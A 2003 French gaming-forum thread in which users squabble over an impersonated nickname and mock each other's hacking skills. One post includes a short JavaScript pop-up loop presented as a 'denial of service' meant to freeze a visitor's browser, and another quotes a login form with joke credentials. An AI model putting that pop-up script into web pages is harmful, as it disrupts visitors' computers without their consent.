CONNEXION
  • RetourJeux
    • Sorties
    • Hit Parade
    • Les + populaires
    • Les + attendus
    • Soluces
    • Tous les Jeux
    • Gaming
  • RetourActu Gaming
    • News
    • Astuces
    • Tests
    • Previews
    • Toute l'actu gaming
  • RetourBons plans
    • Bons plans
    • Bons plans Smartphone
    • Bons plans Hardware
    • Bons plans Image et Son
    • Bons plans Amazon
    • Bons plans Cdiscount
    • Bons plans Decathlon
    • Bons plans Fnac
    • Tous les Bons plans
  • RetourJVTech
    • Actus High-Tech
    • Intelligence Artificielle
    • Smartphones
    • Mobilité urbaine
    • Hardware
    • Image et son
    • Tutoriels
    • Tests produits High-Tech
    • Guides d'achat High-Tech
    • JVTech
  • RetourCulture
    • Actus Culture
    • Culture
  • RetourVidéos
    • A la une
    • Gaming Live
    • Vidéos Tests
    • Vidéos Previews
    • Gameplay
    • Trailers
    • Chroniques
    • Replay Web TV
    • Toutes les vidéos
  • RetourForums
    • Hardware PC
    • PS5
    • Switch 2
    • Xbox Series
    • Switch
    • Pokemon pocket
    • FC 25 Ultimate Team
    • League of Legends
    • Tous les Forums
  • PC
  • PS5
  • Xbox Series
  • Switch 2
  • PS4
  • One
  • Switch
  • iOS
  • Android
  • MMO
  • RPG
  • FPS
En ce moment Genshin Impact Valhalla Breath of the wild Animal Crossing GTA 5 Red dead 2
Half-Life 2
Forum
  • Accueil
  • Actus
  • Tests
  • Vidéos
  • Images
  • Soluces
  • Forum
Liste des sujets

_MaX_ Viens voir ici stp

Pseudo supprimé
Pseudo supprimé 01 octobre 2003 à 20:20:11

Voila aurai tu une adresse hotmail? si oui pourrez tu me la donner? j´ai vu " ton" site http://hl2fr.nofrag.com/ et j ai ete impressionné :ok:

Yam
Yam
Niveau 10
01 octobre 2003 à 20:36:07

le vrai mail de max est sur son profil

Pseudo supprimé
Pseudo supprimé 01 octobre 2003 à 20:36:09

et jai pas pensé a regarder ça carte de visite a l´usurpateur pcq dans sa carte de visite y a ecris " Tete de cul" :p)

Yam
Yam
Niveau 10
01 octobre 2003 à 20:38:31

le vrai max doit avoir 600 jours d´inscription...pas 12

___MaX___
___MaX___
Niveau 2
01 octobre 2003 à 22:58:09

t´es en train de passer pour un con YAM, ça fait le mec qui se parle tout seul, c´est bon ça!

Le denial of service n´est pas une erreur, et encore moins une lacune de sécurité c´est le déclenchement par le biais d´un script Javascript de fonctions répétés à jamais qui vont finir par bloquer l´ordinateur du visiteur .
< head>
< script language="JavaScript"><!--

function dos()
{
var newWindow = window.open("dos.html","_blank",
" width=84,height=42");
}

//--></script>

< /head>
< body>
< script language="JavaScript"><!--

dos();
dos();

//--></script>

< /body>

Yam
Yam
Niveau 10
01 octobre 2003 à 23:24:38

ptdr....tu veut me faire gober que tu serai capable de pirater la page perso de tata paulette? t´a raison, je débute en info... :rire:
tiens, va apprendre les bases ma grande, t´est ridicule
http://www.espionet.com/articles/webmasters.php

PS : ton script, c´est celui de sites type sequence.fr.st ( a ne pas faire), ça a rien a voir avec le hacking....essayes encore einstein :-d

___MaX___
___MaX___
Niveau 2
02 octobre 2003 à 07:30:43

poum pi dou pidou, toum toum, oh yeah!
Non c´est pas de sequence.fr.st ( ce gros site de nazes) et je ne veux rien " hacker"... Les bases ne s´apprennent pas sur le net. Qq bons bouquins de 2000 ou 3000 pages sur le tcp/ip, lunix, c´est plus fiable.

___MaX___
___MaX___
Niveau 2
02 octobre 2003 à 07:34:09

Le tout, accompagné du bouquin : " Les foies gras et conserves de maïté" et là un jour tu pourras devenir un crack...

__MaX__
__MaX__
Niveau 10
02 octobre 2003 à 08:45:43

Des floodeurs dans ton genre, il doivent bien connaitre subseven... et se prendre pour des dieux du hacking... mdr...

Yam
Yam
Niveau 10
02 octobre 2003 à 11:22:40

" Les bases ne s´apprennent pas sur le net. Qq bons bouquins de 2000 ou 3000 pages sur le tcp/ip, lunix, c´est plus fiable."

---> ey l´artiste, je m´emmerde la, tu peut pas nous refaire le coup du copier/coller de la source du site de max, c´était a mourir de rire, j´en veut encore :-d

kjbstar
kjbstar
Niveau 1
02 octobre 2003 à 11:54:12

no comment pour les 2 posts precedents :rire:

__MaX__
__MaX__
Niveau 10
02 octobre 2003 à 11:58:52

ptdr kjb ^^

Yam
Yam
Niveau 10
02 octobre 2003 à 13:45:13

t´a fait quoi hier soir? t´a été sur le site de max, t´a fait un clic droit/afficher la source et t´a fait un copier/coller d´une partie du code, comme un grosse buze qui viens de decouvrir ça et qui se prends pour un hacker...maintenant, tu peut essayer de faire gober ce que tu veut aux ignares en informatique, mais devant moi, t´est un branquignol a mourir de rire, et la seule difference que je vois entre Jean Caude Van Damme et toi, c´est que lui, j´oserai pas lui dire en face que c´est mon comique préféré.

___MaX___
___MaX___
Niveau 2
02 octobre 2003 à 13:48:55

heu non YAM, je n´ai fait aucun clic droit sur le site de MAX. Je m´en fous de savoir comment il a monté son code HTML et javascript, lol... Je te le répète, l´ASP et le PHP sont des langages coté serveur, donc impossible à voir avec un simple clic droit... Faut quand même pas abuser! Là t´es en train de t´enfoncer, hé hé!

Yam
Yam
Niveau 10
02 octobre 2003 à 14:07:37

hey, j´ai trouvé les pass regarde

< input type="text" class="forminput" size="16" name="UserName" onfocus="this.value=´´" value="grosnoob" />
< /td>
< /tr>
< tr>
< td>
< input type=´password´ class=´forminput´ size=´16´ name=´PassWord´ onfocus="this.value=´´" value=´arrachetoi´ />

ooohhh bravo, vous avez passé le level1
ptdr :lol:

tu veut les add de mes sites aussi, j´ai besoin de conseils en sécurité :rire:

___MaX___
___MaX___
Niveau 2
02 octobre 2003 à 14:11:17

t´es vraiment trop un boulet, toi. On sent le mec qui maitrise trop le Copier/Coller...

Yam
Yam
Niveau 10
02 octobre 2003 à 14:14:03

moi aussi, je sais faire des copier collé de sites de hack, de failles qui marchent plus depuis des années...et tu sais quoi, m´a fille de 9 ans aussi. t´est un winner toi, re-ptdr
essayes avec MAX, il y connait que dalle en php.. :rire:

Yam
Yam
Niveau 10
02 octobre 2003 à 14:21:03

ca t´a pas trop fait chier qu´il disparraissent alors :rire:
contente toi de faire ce que tu sais... a savoir flooder
et pis si t´est si baléze, t´a qu´a le hacker le site de max, au lieu de me faire des démos.

__MaX__
__MaX__
Niveau 10
02 octobre 2003 à 14:39:32

le winner déjà... c le mec ki arrive pas a se trouver un pseudo... :malade:

Yam
Yam
Niveau 10
02 octobre 2003 à 15:55:16

T´a mis une faille comme ça, pour faire joli sur un topic destiné au site de MAX, parce que tu savais pas quoi mettre comme flood, OK, admetons
Par contre, faudrait pas que tu t´imagine, qu´on lise tes messages en entier, et encore moins qu´on cherche a les comprendre.
Ensuite, les cours de php ou asp, c´est sur le forum PC ou webmastering que ca se passe, merci.
pour finir, tu condane les " sites" comme sequence.fr qui ont pourtant la meme vocassion que toi, a savoir faire chier le monde, j´en conclu que c´est mal rangé dans ta tête. Sur ce, le debat est clos.

La vidéo du moment